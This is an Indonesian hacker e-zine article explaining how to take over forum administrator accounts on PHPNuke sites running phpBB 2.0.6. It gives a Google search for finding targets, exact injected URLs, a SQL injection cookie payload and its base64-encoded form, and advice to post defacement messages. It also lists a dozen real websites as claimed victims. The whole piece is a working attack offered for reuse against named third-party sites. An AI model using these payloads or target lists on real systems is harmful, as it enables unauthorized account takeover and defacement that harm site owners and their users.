Copy Link
Add to Bookmark
Report
Echo Magazine Issue 07 Phile 0x002
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO-ZINE RELEASE
07
Author: Andr3^81 (andr3-81@linuxmail.org) at #PontyChat
Online @ www.echo.or.id :: http://ezine.echo.or.id
Menjadi Administrator Forum Website di PHPNuke 7.2.0
Berjumpa lagi dengan saya Andr3^81 yg dulunya suka posting artikel tentang Hacking email mulu
trus di protes ama anak² bahwa saya tukang spamer sebenarnya saya bukan mau jadi spamer tetapi
saya hanya iseng ajah. Dari pada berlama-lama ngoceh mending langsung aja deh
Hal yang paling pertama dan paling utama yang perlu kita siapkan adalah:
1. Komputer yg terkoneksi ke internet tentunya
2. Paman Google ( Search Engine Favorit ku )
3. Otak dan pikiran
4. Kreativitas
Mari kita mulai.
Setelah sekian lama saya melanglang buana di internet akhirnya saya menemukan suatu hal
yang menarik yang membuat saya penasaran. Trus saya coba dan ternyata berhasil sehingga saya
berani memposting artikel ini. Mungkin di antara teman-teman ada yang udah tau gemana caranya.
Okeh mari kita mulai Buka Google.com
trus ketik allinurl:modules.php?name=Forums
kalianz akan menemukan banyak site yang menggunakan modules.php tersebut ituh artinya situsnya
menggunakan PHPNuke seperti yang lagi santer-santernya di bicarakan beberapa waktu yang lalu
huehuaehueahuea :P
lihat inih salah satu targetnya
http://www.vocaloid-user.net/modules.php?name=Forums&file=
hehehehhe kita cobain tambah script berikut
Forums&file=profile&mode=viewprofile&u=2
jadi seperti ini situsnya
http://www.vocaloid-user.net/modules.php?name=Forums&file=profile&mode=viewprofile&u=2
mengapa u=2 karena dalam Sintaks SQL User admin adalah user_id=2
setelah kalian inject, kalian akan mendapatkan Cookie pada halaman atas berbentuk seperti ini
Welcome x' UNION SELECT 2,null,'pass',1,null/*:pass
Jika kalian telah mendapat hal seperti ituh bisa di katakan kalian udah berhasil melihat
Profile sang admin Forum,setelah kalian bisa melihat profile dari sang admin coba masukan
script ini Forums&user=eDp4JyBVTklPTiBTRUxFQ1QgMixudWxsLCdwYXNzJywxLG51bGwvKjpwYXNz
menjadi
http://www.vocaloid-user.net/modules.php?name=Forums&user=eDp4JyBVTklPTiBTRUxFQ1QgMixudWxsLCdwYXNzJywxLG51bGwvKjpwYXNz
koq ada eDp4JyBVTklPTiBTRUxFQ1QgMixudWxsLCdwYXNzJywxLG51bGwvKjpwYXNz <-= apa ya?
oke saya akan menjelaskan sedikit itu adalah encrypt dari password sang admin yang
di enkripsi menggunakan PHP.Dan kalian akan melihat bahwa kalian sekarang sudah menjadi
admin Forum, tandanya adalah adanya tanda Log Out pada atas halaman Forum seperti ini
Forum FAQ Search Usergroups Profile No new messages Log out [ admin ]
tapi jika ngga berhasil kalian akan menemukan seperti ini
Forum FAQ Search Usergroups Profile Log in to check your private messages Log in
Jika kalian telah mendapatkan ada Link Log Out berarti kalian udah berhasil menjadi admin
Forum di website itu, tinggal kalian mau apa terserah bisa juga tambah posting seperti ini
[B]hacked By Andr3^81 at #PontyChat DALnet[/B]
[B]hacked By Andr3^81 at #PontyChat DALnet[/B]
[B]hacked By Andr3^81 at #PontyChat DALnet[/B]
[B]hacked By Andr3^81 at #PontyChat DALnet[/B]
tanda [B] adalah kode dari PHPBB yang artinya Bold
setelah semuanya selesai jangan lupa Log Out ya
mungkin hanya ituh tulisan dari saya silakan kalian kembangkan sendiri
Ini ada beberapa situs yg menjadi korban :
http://www.peakoilaction.org/modules.php?name=Forums&file=viewtopic&p=89&sid=6b1361fa7c773d87eb394259d95f9464#89
http://www.vocaloid-user.net/modules.php?name=Forums&file=viewtopic&p=1477#1477
http://www.albini.net/modules.php?name=Forums&file=viewtopic&p=841&sid=dc54b0f611d4422e1c1b5579acbbb7ad#841
http://www.prepressforums.com/modules.php?name=Forums&file=viewtopic&p=6700#6700
http://www.portaljava.com/home/modules.php?name=Forums&file=viewtopic&p=26789#26789
http://www.monster-hardware.com/modules.php?name=Forums&file=viewtopic&p=18490#18490
http://www.acmqueue.org/modules.php?name=Forums&file=viewtopic&t=102&sid=845b8cfe7904a7fa9dc9702ec797ac00
http://www.drishtipat.org/nuke/modules.php?name=Forums&file=viewtopic&t=162
http://www.crosstowntraffic.net/modules.php?name=Forums&file=viewtopic&t=12&sid=365caed4a7459800664770415d37468c
http://www.totalrekall.co.uk/modules.php?name=Forums&file=viewtopic&t=227&sid=bd6481d7fa39ac6df4a70eecb06076f8
http://www.glug-howrah.org/modules.php?name=Forums&file=viewtopic&t=81&sid=7e7a56550dcd951bd99e5685e1cfc18a
yang lainnya silakan anda cari sendiri
NB: script ini hanya bekerja pada phpbb2.0.6
Greets: Jasakom, #e-c-h-o, #PontyChat #batamhacker #Malanghackerlink #hackercrew
#samarindahack DALnet, dan semua anak-anak yang menyenangi Informasi ini
Thanks to: Kudel BayLaw Sincan2 Sitaboyan mujie kl3z ReD_oNe OchiE CROCODILLE SeTroM
bmw_ceper kamang BLacKsCreEN tr0ut [B]L4C[K]^[Z]4C[K] dh1an cangak
Ristobrata m_beben co_www banezz D_H_A_N_Y the_day Bithedz cicakkejepit
dewa_pojangga MinangCrew `YaYan`
Sumber: http://www.waraxe.us/?modname=sa&id=017
Motto: I'm Not a Hacker Yet But Someday I believe I can make it